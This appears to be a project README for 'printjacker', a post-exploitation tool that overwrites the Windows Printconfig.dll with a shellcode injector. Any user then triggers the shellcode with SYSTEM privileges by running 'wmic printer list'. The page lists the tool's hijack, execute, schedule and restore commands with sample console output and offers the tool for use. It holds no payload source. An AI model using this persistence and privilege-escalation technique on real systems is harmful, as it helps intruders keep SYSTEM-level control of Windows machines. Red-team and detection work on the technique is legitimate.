Home

Awesome

printjacker

Printjacker is a post-exploitation tool that creates a persistence mechanism by overwriting Printconfig.dll with a shellcode injector. The persistence mechanism can be invoked via executing wmic printer list command with any user. The shellcode will be executed with SYSTEM privileges. Details: POST.md

flow

Usage

.\printjacker.exe [-find] | [-hijack] | [-execute] | [-schedule] | [-restore]
    -find     : Find the directory of Printconfig.dll
    -hijack   : Overwrite Printconfig.dll with shellcode injector and copy original to Printconfig_orig.dll
    -execute  : Hijack Printconfig.dll and execute "wmic printer list" as the current user
    -schedule : Hijack printconfig.dll and schedule "wmic printer list"
    -restore  : Restore Printconfig.dll to original

.\printjacker.exe -execute
# Printjacker - Hijack Printconfig.dll
# Author: millers-crossing
-------------------------------------------------
[*] PrintConfig.dll is found: c:\windows\system32\DriverStore\FileRepository\prnms003.inf_amd64_9d6cd193d2dd61fd\Amd64
...
...
[+] Resource is found. Trying to modify the target file...
[+] Original Dll is copied to Princonfig_orig.dll
[+] Printconfig.dll is successfully modified!
[*] Working in Execute mode
[*] Trying to execute payload by using "wmic printer list"...
...

.\printjacker.exe -restore
# Printjacker - Hijack Printconfig.dll
# Author: millers-crossing
-------------------------------------------------
[*] PrintConfig.dll is found: c:\windows\system32\DriverStore\FileRepository\prnms003.inf_amd64_9d6cd193d2dd61fd\Amd64
[+] Printconfig.dll is restored from Printconfig_orig.dll

.\printjacker.exe -find
# Printjacker - Hijack Printconfig.dll
# Author: millers-crossing
-------------------------------------------------
[*] PrintConfig.dll is found: c:\windows\system32\DriverStore\FileRepository\prnms003.inf_amd64_9d6cd193d2dd61fd\Amd64

References

Thanks to great works by @SandboxBear, @tiraniddo, @aionescu, @yarden_shafir, @decoder_it, @spotheplanet ...

TODO